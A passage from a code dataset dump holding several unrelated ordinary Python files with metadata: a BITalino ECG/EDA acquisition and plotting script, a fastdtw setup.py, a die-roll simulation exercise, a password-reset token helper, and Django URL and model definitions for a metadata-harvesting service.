ax_eda.plot(time_elapsed, eda, 'b-', label=' eda filtered') # peaks\n fig1.show()\n fig1.canvas.draw()\n\n\n filename = 'raw_data/recording_'+ str(datetime.datetime.now()) + '.txt'\n\n try:\n # indefinite signal capture\n while 1:\n # read data from the device\n received_data = device.read(nSamples)\n\n if(save_raw_data):\n write_to_file(filename,received_data)\n\n ecg_data = np.concatenate((ecg_data, ecg_bin_to_millivolts(received_data[:, -1])), axis=0)\n eda_data = np.concatenate((eda_data, eda_bin_to_microsiemens(received_data[:, -2])), axis=0)\n\n\n # we detrend the data for heart rate\n ecg = signal.detrend(ecg_data)\n\n # we convert the data from binary to micro siemens.\n eda_raw = eda_data\n\n # highpassfilter for EDA\n ale,ble = butter_highpass(0.05, Fs) # high pass cutoff = 0.05 Hz\n eda = signal.filtfilt(ale, ble, eda_raw);\n\n\n #bandpassfilter for ECG\n ale,ble = butter_bandpass(lowcut, highcut , Fs)\n ecg_filtered = signal.filtfilt(ale, ble, ecg);\n\n\n # update time\n time_elapsed = np.concatenate((time_elapsed, np.linspace(timeinit, timeend, nSamples + 1)[1:]), 0)\n timeinit = time_elapsed[-1]\n timeend += float(nSamples) / float(samplingRate)\n\n\n # update plot everytime you recive the data\n # note that we show the user past 500 data samples and hence data from past 0.5 second = 500 msec(millisec)\n x = time_elapsed[-szplot:]\n y_raw = ecg[-szplot:]\n y_filtered = ecg_filtered[-szplot:]\n\n # we now find peaks for past 0.5 seconds ( R peak detection)\n peakind = getpeak(y_filtered, x) # METHOD 1\n\n\n # some adjustments to plot the data\n x_peaks = [x[i] for i in peakind] # peak time\n y_peaks = [y_filtered[i] for i in peakind] # peak value\n\n\n heart_rate = get_time_domain_features(y_filtered, peakind,Fs)\n\n\n if math.isnan(heart_rate):\n heart_rate= 40\n\n\n if (plot):\n line0.set_data(x, ecg_data[-szplot:])\n line1.set_data(x,y_raw)\n line2.set_data(x, y_filtered)\n line3.set_data(x_peaks,y_peaks)\n # line4.set_data(x_peaks_hamilton, y_peaks_hamilton)\n\n ax.relim()\n ax.autoscale_view()\n fig.canvas.draw()\n ax.legend(loc='upper right',handles=[line0,line1,line2,line3]) # to add the legend.\n plt.draw()\n\n line.set_data(x, eda_raw[-szplot:])\n lineeda1.set_data(x,eda[-szplot:])\n ax_eda.relim()\n ax_eda.autoscale_view()\n fig1.canvas.draw()\n ax_eda.legend(loc='upper right',handles=[line,lineeda1]) # to add the legend.\n plt.draw()\n\n # send data to server as a json\n # note we send the last 500\n #{ \"ecg\" : \"[data]\" ,\n # \"fatures\" = [hr,other?],\n # \"eda\" = \"[eda data]\"\n # }\n ##############################\n data_as_json = \"{ \\\"ecg\\\" : \"\n data_as_json = data_as_json + tostring(y_filtered) + ','\n data_as_json = data_as_json + \" \\\"ecg_features\\\" : \" + str(heart_rate) + '}'\n\n\n # we initially send ecg data\n if send_flag:\n send_to_server(data_as_json)\n\n # prep eda data\n eda_data_as_json = \"{ \\\"eda\\\" : \"\n eda_data_as_json = eda_data_as_json + tostring(eda[-szplot:]) + '}'\n\n if send_flag:\n send_to_server(eda_data_as_json)\n\n print('data sent to the web server...')\n\n except KeyboardInterrupt:\n print(\"Keyboard interupted\")\n # Turn BITalino led on\n device.trigger(digitalOutput)\n # Stop acquisition\n device.stop()\n # Close connection\n device.close()\n\ndef usage(message):\n print(\"\"\"\n\n Usage: pyhton3 collect_data [OPTIONS] -c CONFIGFILE\n\n -c FILENAME, --configfile FILENAME Use FILENAME for configuration\n -h, --help Show help\n \"\"\")\n\n if(message):\n print(\"\\nERROR: \" + message + \"\\n\\n\")\n 
sys.exit(2)\n\n\ndef main():\n global WEB_HOST_ADDRESS\n global WEB_PORT\n try:\n opts, args = getopt.getopt(sys.argv[1:], \"hc:d\", [\"help\", \"configfile=\"])\n except getopt.GetoptError as err:\n # print help information and exit:\n print(err) # will print something like \"option -a not recognized\"\n usage()\n\n configfile = None\n for o, a in opts:\n if o in (\"-h\", \"--help\"):\n usage()\n elif o in (\"-c\", \"--configfile\"):\n configfile = a\n else:\n assert False, \"unhandled option\"\n\n if(configfile is None):\n usage(\"Missing configfile\")\n if(not os.path.exists(configfile)):\n usage(\"Cannot open file \" + configfile)\n\n # read the config file.\n print(\"Using config file : \" + configfile)\n config = configparser.ConfigParser()\n config.read(configfile)\n\n WEB_HOST_ADDRESS = config.get(\"Server\", \"Listen\")\n WEB_PORT = config.get(\"Server\", \"Port\")\n\n WEB_HOST_ADDRESS = str(WEB_HOST_ADDRESS)\n print(WEB_HOST_ADDRESS, WEB_PORT)\n\n\n print(macAddress,running_time,batteryThreshold,acqChannels,samplingRate,nSamples)\n print(\"data collection process strated\")\n bitalino_data_collection()\n\n\n\nif __name__ == \"__main__\":\n\n main()", "sub_path": "collect_data.py", "file_name": "collect_data.py", "file_ext": "py", "file_size_in_byte": 11867, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.shape", "line_number": 53, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 76, "usage_type": "call"}, {"api_name": "scipy.signal.butter", "line_number": 91, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 91, "usage_type": "name"}, {"api_name": "scipy.signal.butter", "line_number": 97, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 97, "usage_type": "name"}, {"api_name": "peakutils.indexes", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 179, "usage_type": "call"}, {"api_name": "local_bitalino.BITalino", "line_number": 192, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 219, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 219, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ion", "line_number": 222, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 222, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 223, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 223, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 232, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 232, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ion", "line_number": 234, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 234, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 235, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 235, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 236, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 236, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 243, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 243, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 254, 
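The acquisition script above converts raw BITalino ADC counts into physical units. The same transfer functions written with explicit parentheses; VCC = 3.3 V, n = 10 bits and G_ecg = 1100 follow the values used in the script and should be treated as assumptions for other hardware revisions:

def ecg_to_millivolts(adc, n_bits=10, vcc=3.3, gain=1100):
    # ECG(mV) = ((ADC / 2**n) - 1/2) * VCC / G * 1000
    return ((adc / 2 ** n_bits) - 0.5) * vcc / gain * 1000.0

def eda_to_microsiemens(adc, n_bits=10):
    # conductance (uS) = 1 / R_MOhm, with R_MOhm = 1 - ADC / 2**n
    return 1.0 / (1.0 - adc / 2 ** n_bits)

print(ecg_to_millivolts(512))    # mid-scale sample -> 0.0 mV
print(eda_to_microsiemens(512))  # -> 2.0 uS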
"usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 255, "usage_type": "call"}, {"api_name": "scipy.signal.detrend", "line_number": 259, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 259, "usage_type": "name"}, {"api_name": "scipy.signal.filtfilt", "line_number": 266, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 266, "usage_type": "name"}, {"api_name": "scipy.signal.filtfilt", "line_number": 271, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 271, "usage_type": "name"}, {"api_name": "numpy.concatenate", "line_number": 275, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 275, "usage_type": "call"}, {"api_name": "math.isnan", "line_number": 298, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.draw", "line_number": 313, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 313, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.draw", "line_number": 321, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 321, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 368, "usage_type": "call"}, {"api_name": "getopt.getopt", "line_number": 375, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 375, "usage_type": "attribute"}, {"api_name": "getopt.GetoptError", "line_number": 376, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 392, "usage_type": "call"}, {"api_name": "os.path", "line_number": 392, "usage_type": "attribute"}, {"api_name": "configparser.ConfigParser", "line_number": 397, "usage_type": "call"}]} +{"seq_id": "164633444", "text": "from setuptools import setup, find_packages, Extension\nimport os.path\nimport warnings\n\nclassifiers = [\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 3',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: MIT License',\n 'Topic :: Scientific/Engineering'\n]\n\nextensions = [Extension(\n 'fastdtw._fastdtw',\n [os.path.join('fastdtw', \"_fastdtw.pyx\")],\n language=\"c++\",\n include_dirs=[],\n libraries=[\"stdc++\"]\n )]\n\nkwargs = {\n 'name': 'fastdtw',\n 'version': '0.3.0',\n 'author': 'Kazuaki Tanida',\n 'url': 'https://github.com/slaypni/fastdtw',\n 'description': 'Dynamic Time Warping (DTW) algorithm with an O(N) time and memory complexity.',\n 'license': 'MIT',\n 'keywords': ['dtw'],\n 'install_requires': ['numpy'],\n 'packages': find_packages(),\n 'ext_modules': extensions,\n 'test_suite': 'tests',\n 'setup_requires': ['pytest-runner'],\n 'tests_require': ['pytest'],\n 'classifiers': classifiers\n}\n\ntry:\n setup(**kwargs)\nexcept SystemExit:\n del kwargs['ext_modules']\n warnings.warn('compilation failed. 
Installing pure python package')\n setup(**kwargs)\n", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1198, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "setuptools.Extension", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path.path.join", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 15, "usage_type": "name"}, {"api_name": "setuptools.find_packages", "line_number": 30, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 39, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 42, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "137787049", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 7 09:27:08 2017\n\n@author: newuser\n\"\"\"\n\nimport random, pylab\nfrom matplotlib import pyplot, pylab\n\n# You are given this function\ndef getMeanAndStd(X):\n mean = sum(X)/float(len(X))\n tot = 0.0\n for x in X:\n tot += (x - mean)**2\n std = (tot/len(X))**0.5\n return mean, std\n\n# You are given this class\nclass Die(object):\n def __init__(self, valList):\n \"\"\" valList is not empty \"\"\"\n self.possibleVals = valList[:]\n def roll(self):\n return random.choice(self.possibleVals)\n\n# Implement this -- Coding Part 1 of 2\ndef makeHistogram(values, numBins, xLabel, yLabel, title=None):\n \"\"\"\n - values, a sequence of numbers\n - numBins, a positive int\n - xLabel, yLabel, title, are strings\n - Produces a histogram of values with numBins bins and the indicated labels\n for the x and y axis\n - If title is provided by caller, puts that title on the figure and otherwise\n does not title the figure\n \"\"\"\n \n\n pylab.hist(values, bins = numBins)\n\n pylab.xlabel(xLabel)\n pylab.ylabel(yLabel)\n\n if title != None:\n pylab.title(title)\n\n pylab.show()\n \n#makeHistogram([21,20,19,1,2,2,2,5,6,6,9,10], 5, \"Aaaaa\", \"Bbbbb\", \"Ccccc\")\n \n# Implement this -- Coding Part 2 of 2\ndef getAverage1(die, numRolls, numTrials):\n \"\"\"\n - die, a Die\n - numRolls, numTrials, are positive ints\n - Calculates the expected mean value of the longest run of a number\n over numTrials runs of numRolls rolls.\n - Calls makeHistogram to produce a histogram of the longest runs for all\n the trials. 
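The setup.py record relies on setuptools signalling a failed native build via SystemExit. The same fall-back shape in isolation, with illustrative package and extension names:

import warnings
from setuptools import setup, Extension

kwargs = {
    'name': 'example-pkg',
    'version': '0.1.0',
    'packages': [],
    'ext_modules': [Extension('example._speedups', ['example/_speedups.c'])],
}

try:
    setup(**kwargs)
except SystemExit:
    # setuptools reports compiler failures by exiting; retry as pure Python
    del kwargs['ext_modules']
    warnings.warn('compilation failed. Installing pure python package')
    setup(**kwargs)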
There should be 10 bins in the histogram\n - Choose appropriate labels for the x and y axes.\n - Returns the mean calculated\n \"\"\"\n \n results = []\n mean_list = []\n \n for trial in range(numTrials):\n roll_list = []\n best_run = (0,0)\n \n for roll in range(numRolls):\n roll_list.append(die.roll())\n \n for i in roll_list:\n candidate = (i, roll_list.count(i))\n if candidate[1] > best_run[1]:\n best_run = candidate\n \n for i in range(best_run[1]): \n mean_list.append(best_run[0])\n \n results.append(best_run[0])\n \n# mean_list.append(sum(roll_list)/len(roll_list))\n print(roll_list)\n\n print(mean_list)\n print(results)\n \n makeHistogram(results, numBins = 10, xLabel = 'Longest run', yLabel = '# occurances')\n \n# return sum(mean_list)/len(mean_list)\n return sum(mean_list)/len(mean_list)\n\n\ndef getAverage(die, numRolls, numTrials):\n \"\"\"\n - die, a Die\n - numRolls, numTrials, are positive ints\n - Calculates the expected mean value of the longest run of a number\n over numTrials runs of numRolls rolls.\n - Calls makeHistogram to produce a histogram of the longest runs for all\n the trials. There should be 10 bins in the histogram\n - Choose appropriate labels for the x and y axes.\n - Returns the mean calculated\n \"\"\"\n\n longest_runs = []\n\n for trial in range(numTrials):\n die_rolls = {}\n counter = 1\n \n last_roll = None\n \n for each in die.possibleVals:\n die_rolls[each] = 0\n \n for roll in range(numRolls):\n new_roll = die.roll()\n if new_roll != last_roll:\n counter = 1\n else:\n counter += 1\n if counter > die_rolls[new_roll]:\n die_rolls[new_roll] = counter\n\n last_roll = new_roll\n\n\n longest_runs.append(max(die_rolls.values()))\n# print(die_rolls)\n\n \n makeHistogram(longest_runs, numBins = 10, xLabel = 'Longest run', yLabel = '# occurances')\n# print(longest_runs)\n return sum(longest_runs)/len(longest_runs)\n \n \n \n# One test case\n\n#print(getAverage(Die([1,2,3,4,5,6,6,6,7]), 500, 10000))\n#5.312\n\n#print(getAverage(Die([1,2,3,4,5,6,6,6,7]), 5, 100))\n#?\n\n#print(getAverage(Die([1]), 10, 1000))\n#10.0\n\n#print(getAverage(Die([1,1]), 10, 1000))\n#10.0\n\n#print(getAverage(Die([1,2,3,4,5,6,6,6,7]), 1, 1000))\n#1\n\n#print(getAverage(Die([1,2,3,4,5,6]), 50, 1000))\n#?\n\n\n\n##only use pylab.hist, pylab.title, pylab.xlabel, pylab.ylabel, pylab.show", "sub_path": "Final/die.py", "file_name": "die.py", "file_ext": "py", "file_size_in_byte": 4391, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "random.choice", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pylab.hist", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pylab.xlabel", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pylab.ylabel", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pylab.title", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pylab.show", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 50, "usage_type": "name"}]} +{"seq_id": "274849438", "text": "\"\"\"Tools for building and working with password-reset tokens.\n\nThis file is a modified version of a similar one in 
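For the longest-run computation in the die record above, itertools.groupby gives a compact alternative sketch (an illustration, not the course's reference solution):

import random
from itertools import groupby

def longest_run(rolls):
    """Length of the longest run of consecutive identical values."""
    return max(len(list(group)) for _, group in groupby(rolls))

random.seed(0)  # reproducible demo
rolls = [random.choice([1, 2, 3, 4, 5, 6]) for _ in range(50)]
print(rolls)
print(longest_run(rolls))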
Flask-User and the original\nhas the following copyright information:\n :copyright: (c) 2013 by Ling Thio\n :author: Ling Thio (ling.thio@gmail.com)\n :license: Simplified BSD License, see LICENSE.txt for more details.\n\"\"\"\n\nimport base64\nfrom cryptography.hazmat.primitives.ciphers import (\n Cipher,\n algorithms as cipher_algos,\n modes as cipher_modes,\n)\nfrom cryptography.hazmat.backends import default_backend as crypto_backend\nfrom itsdangerous import BadSignature, SignatureExpired, TimestampSigner\n\n\nclass TokenManager(object):\n def __init__(self, secret, timestamp_signer=TimestampSigner):\n # Create cypher to encrypt IDs and ensure >=16 characters\n\n key = secret\n if not isinstance(key, bytes):\n key = secret.encode(\"utf-8\")\n if len(key) < 16:\n raise ValueError('Key must be at least 16 bytes long')\n self.cipher = Cipher(cipher_algos.AES(key[:16]), cipher_modes.ECB(), crypto_backend())\n self.signer = timestamp_signer(secret)\n\n def encrypt(self, data):\n \"\"\"Encrypts data to url-safe base64 string.\"\"\"\n padded = data + (b' ' * (16 - (len(data) % 16)))\n encryptor = self.cipher.encryptor()\n encrypted = encryptor.update(padded)\n base64ed = base64.urlsafe_b64encode(encrypted) # URL safe base64 string with '=='\n return base64ed[0:-2] # base64 string without '=='\n\n def decrypt(self, encrypted_data):\n \"\"\"Decrypts url-safe base64 string to original data.\n\n :param encrypted_data: must be bytes.\n \"\"\"\n try:\n base64ed = encrypted_data + b'==' # base64 string with '=='\n encrypted = base64.urlsafe_b64decode(base64ed) # encrypted data\n decryptor = self.cipher.decryptor()\n padded = decryptor.update(encrypted)\n return padded.strip()\n except Exception as e: # pragma: no cover\n print('!!!Exception in decrypt!!!:', e)\n return None\n\n def generate_token(self, data):\n \"\"\"Return token with data, timestamp, and signature\"\"\"\n # In Python3 we must make sure that bytes are converted to strings.\n # Hence the addition of '.decode()'\n return self.signer.sign(self.encrypt(data)).decode()\n\n def verify_token(self, token, expiration_timedelta):\n \"\"\"Verify token and return (has_expired, data).\n\n :param token: is the full token string as generated by `generate_token`.\n :param expiration_timedelta: is a `datetime.timedelta` describing how old the toen\n may be.\n\n :returns: `(False, data)` on success.\n `(False, None)` on bad data.\n `(True, None)` on expired token.\n \"\"\"\n try:\n data = self.signer.unsign(token, max_age=expiration_timedelta.total_seconds())\n return (False, self.decrypt(data))\n except SignatureExpired:\n return (True, None)\n except BadSignature:\n return (False, None)\n", "sub_path": "keg_bouncer/tokens.py", "file_name": "tokens.py", "file_ext": "py", "file_size_in_byte": 3181, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "itsdangerous.TimestampSigner", "line_number": 21, "usage_type": "name"}, {"api_name": "cryptography.hazmat.primitives.ciphers.Cipher", "line_number": 29, "usage_type": "call"}, {"api_name": "cryptography.hazmat.primitives.ciphers.algorithms.AES", "line_number": 29, "usage_type": "call"}, {"api_name": "cryptography.hazmat.primitives.ciphers.algorithms", "line_number": 29, "usage_type": "name"}, {"api_name": "cryptography.hazmat.primitives.ciphers.modes.ECB", "line_number": 29, "usage_type": "call"}, {"api_name": "cryptography.hazmat.primitives.ciphers.modes", "line_number": 29, "usage_type": "name"}, {"api_name": 
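A hypothetical round-trip with the TokenManager above, assuming the module is importable as keg_bouncer.tokens per the record's path; the 16-byte secret is a placeholder, never a real application key:

import datetime
from keg_bouncer.tokens import TokenManager

tm = TokenManager(secret='0123456789abcdef')  # exactly 16 bytes, passes the length check
token = tm.generate_token(b'user-42')         # pad, encrypt, sign with timestamp
has_expired, data = tm.verify_token(token, datetime.timedelta(hours=1))
assert (has_expired, data) == (False, b'user-42')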
"cryptography.hazmat.backends.default_backend", "line_number": 29, "usage_type": "call"}, {"api_name": "base64.urlsafe_b64encode", "line_number": 37, "usage_type": "call"}, {"api_name": "base64.urlsafe_b64decode", "line_number": 47, "usage_type": "call"}, {"api_name": "itsdangerous.SignatureExpired", "line_number": 75, "usage_type": "name"}, {"api_name": "itsdangerous.BadSignature", "line_number": 77, "usage_type": "name"}]} +{"seq_id": "195181301", "text": "from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\n\nurlpatterns = patterns('',\n url(r'^$', include('apps.home.urls')),\n url(r'^feed/(.*)/', include('apps.feed.urls')),\n url(r'^feed/(.*)/json', include('apps.feed_json.urls')),\n url(r'^sidepanel/$', include('apps.side_panel.urls')),\n url(r'^admin/', include(admin.site.urls)),\n)\n", "sub_path": "Feed/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 397, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.conf.urls.patterns", "line_number": 4, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 5, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 5, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 6, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 6, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 7, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 9, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 9, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 9, "usage_type": "name"}]} +{"seq_id": "285896218", "text": "import contextlib\nimport datetime\nimport logging\nfrom typing import Optional\n\nfrom django.core import validators\nfrom django.core.files.base import ContentFile\nfrom django.core.files.storage import Storage\nfrom django.db import DEFAULT_DB_ALIAS\nfrom django.db import connection\nfrom django.db import connections\nfrom django.db import models\nfrom django.db.models.functions import Coalesce\nfrom django.urls import reverse\nfrom django.utils import timezone\nfrom django.utils.deconstruct import deconstructible\n\nfrom share.models.fields import EncryptedJSONField\nfrom share.models.fuzzycount import FuzzyCountManager\nfrom share.util import chunked, placeholders, BaseJSONAPIMeta\nfrom share.util.extensions import Extensions\n\n\nlogger = logging.getLogger(__name__)\n__all__ = ('Source', 'RawDatum', 'SourceConfig', 'Harvester', 'Transformer', 'SourceUniqueIdentifier')\n\n\nclass SourceIcon(models.Model):\n source_name = models.TextField(unique=True)\n image = models.BinaryField()\n\n\n@deconstructible\nclass SourceIconStorage(Storage):\n def _open(self, name, mode='rb'):\n assert mode == 'rb'\n icon = SourceIcon.objects.get(source_name=name)\n return ContentFile(icon.image)\n\n def _save(self, name, content):\n SourceIcon.objects.update_or_create(source_name=name, defaults={'image': content.read()})\n return name\n\n def delete(self, name):\n SourceIcon.objects.get(source_name=name).delete()\n\n 
def get_available_name(self, name, max_length=None):\n return name\n\n def url(self, name):\n return reverse('source_icon', kwargs={'source_name': name})\n\n\ndef icon_name(instance, filename):\n return instance.name\n\n\nclass NaturalKeyManager(models.Manager):\n use_in_migrations = True\n\n def __init__(self, *key_fields):\n super(NaturalKeyManager, self).__init__()\n self.key_fields = key_fields\n\n def get_by_natural_key(self, key):\n return self.get(**dict(zip(self.key_fields, key)))\n\n\nclass Source(models.Model):\n name = models.TextField(unique=True)\n long_title = models.TextField(unique=True)\n home_page = models.URLField(null=True, blank=True)\n icon = models.ImageField(upload_to=icon_name, storage=SourceIconStorage(), blank=True)\n is_deleted = models.BooleanField(default=False)\n\n # Whether or not this SourceConfig collects original content\n # If True changes made by this source cannot be overwritten\n # This should probably be on SourceConfig but placing it on Source\n # is much easier for the moment.\n # I also haven't seen a situation where a Source has two feeds that we harvest\n # where one provider unreliable metadata but the other does not.\n canonical = models.BooleanField(default=False, db_index=True)\n\n # TODO replace with object permissions, allow multiple sources per user (SHARE-996)\n user = models.OneToOneField('ShareUser', null=True, on_delete=models.CASCADE)\n\n objects = NaturalKeyManager('name')\n\n class JSONAPIMeta(BaseJSONAPIMeta):\n pass\n\n def natural_key(self):\n return (self.name,)\n\n def __repr__(self):\n return '<{}({}, {}, {})>'.format(self.__class__.__name__, self.pk, self.name, self.long_title)\n\n def __str__(self):\n return repr(self)\n\n\nclass SourceConfigManager(NaturalKeyManager):\n def get_or_create_push_config(self, user, transformer_key):\n config_label = '{}.{}'.format(user.username, transformer_key)\n try:\n return SourceConfig.objects.get(label=config_label)\n except SourceConfig.DoesNotExist:\n source, _ = Source.objects.get_or_create(\n user=user,\n defaults={\n 'name': user.username,\n 'long_title': user.username,\n }\n )\n config, _ = SourceConfig.objects.get_or_create(\n label=config_label,\n defaults={\n 'source': source,\n 'transformer': Transformer.objects.get(key=transformer_key),\n }\n )\n return config\n\n\nclass SourceConfig(models.Model):\n # Previously known as the provider's app_label\n label = models.TextField(unique=True)\n version = models.PositiveIntegerField(default=1)\n\n source = models.ForeignKey('Source', on_delete=models.CASCADE, related_name='source_configs')\n base_url = models.URLField(null=True)\n earliest_date = models.DateField(null=True, blank=True)\n rate_limit_allowance = models.PositiveIntegerField(default=5)\n rate_limit_period = models.PositiveIntegerField(default=1)\n\n # Allow null for push sources\n harvester = models.ForeignKey('Harvester', null=True, on_delete=models.CASCADE)\n harvester_kwargs = models.JSONField(null=True, blank=True)\n harvest_interval = models.DurationField(default=datetime.timedelta(days=1))\n harvest_after = models.TimeField(default='02:00')\n full_harvest = models.BooleanField(default=False, help_text=(\n 'Whether or not this SourceConfig should be fully harvested. '\n 'Requires earliest_date to be set. '\n 'The schedule harvests task will create all jobs necessary if this flag is set. '\n 'This should never be set to True by default. 
'\n ))\n\n # Allow null for push sources\n # TODO put pushed data through a transformer, add a JSONLDTransformer or something for backward compatibility\n transformer = models.ForeignKey('Transformer', null=True, on_delete=models.CASCADE)\n transformer_kwargs = models.JSONField(null=True, blank=True)\n\n regulator_steps = models.JSONField(null=True, blank=True)\n\n disabled = models.BooleanField(default=False)\n\n private_harvester_kwargs = EncryptedJSONField(blank=True, null=True)\n private_transformer_kwargs = EncryptedJSONField(blank=True, null=True)\n\n objects = SourceConfigManager('label')\n\n class JSONAPIMeta(BaseJSONAPIMeta):\n pass\n\n def natural_key(self):\n return (self.label,)\n\n def get_harvester(self, **kwargs):\n \"\"\"Return a harvester instance configured for this SourceConfig.\n\n **kwargs: passed to the harvester's initializer\n \"\"\"\n return self.harvester.get_class()(self, **kwargs)\n\n def get_transformer(self, **kwargs):\n \"\"\"Return a transformer instance configured for this SourceConfig.\n\n **kwargs: passed to the transformer's initializer\n \"\"\"\n return self.transformer.get_class()(self, **kwargs)\n\n @contextlib.contextmanager\n def acquire_lock(self, required=True, using='default'):\n from share.harvest.exceptions import HarvesterConcurrencyError\n\n # NOTE: Must be in transaction\n logger.debug('Attempting to lock %r', self)\n with connections[using].cursor() as cursor:\n cursor.execute(\"SELECT pg_try_advisory_lock(%s::regclass::integer, %s);\", (self._meta.db_table, self.id))\n locked = cursor.fetchone()[0]\n if not locked and required:\n logger.warning('Lock failed; another task is already harvesting %r.', self)\n raise HarvesterConcurrencyError('Unable to lock {!r}'.format(self))\n elif locked:\n logger.debug('Lock acquired on %r', self)\n else:\n logger.warning('Lock not acquired on %r', self)\n try:\n yield\n finally:\n if locked:\n cursor.execute(\"SELECT pg_advisory_unlock(%s::regclass::integer, %s);\", (self._meta.db_table, self.id))\n logger.debug('Lock released on %r', self)\n\n def __repr__(self):\n return '<{}({}, {})>'.format(self.__class__.__name__, self.pk, self.label)\n\n __str__ = __repr__\n\n\nclass Harvester(models.Model):\n key = models.TextField(unique=True)\n date_created = models.DateTimeField(auto_now_add=True)\n date_modified = models.DateTimeField(auto_now=True)\n\n objects = NaturalKeyManager('key')\n\n @property\n def version(self):\n return self.get_class().VERSION\n\n def natural_key(self):\n return (self.key,)\n\n def get_class(self):\n return Extensions.get('share.harvesters', self.key)\n\n def __repr__(self):\n return '<{}({}, {})>'.format(self.__class__.__name__, self.pk, self.key)\n\n def __str__(self):\n return repr(self)\n\n\nclass Transformer(models.Model):\n key = models.TextField(unique=True)\n date_created = models.DateTimeField(auto_now_add=True)\n date_modified = models.DateTimeField(auto_now=True)\n\n objects = NaturalKeyManager('key')\n\n @property\n def version(self):\n return self.get_class().VERSION\n\n def natural_key(self):\n return (self.key,)\n\n def get_class(self):\n return Extensions.get('share.transformers', self.key)\n\n def __repr__(self):\n return '<{}({}, {})>'.format(self.__class__.__name__, self.pk, self.key)\n\n def __str__(self):\n return repr(self)\n\n\nclass SourceUniqueIdentifier(models.Model):\n identifier = models.TextField()\n source_config = models.ForeignKey('SourceConfig', on_delete=models.CASCADE)\n\n class JSONAPIMeta(BaseJSONAPIMeta):\n pass\n\n class Meta:\n unique_together 
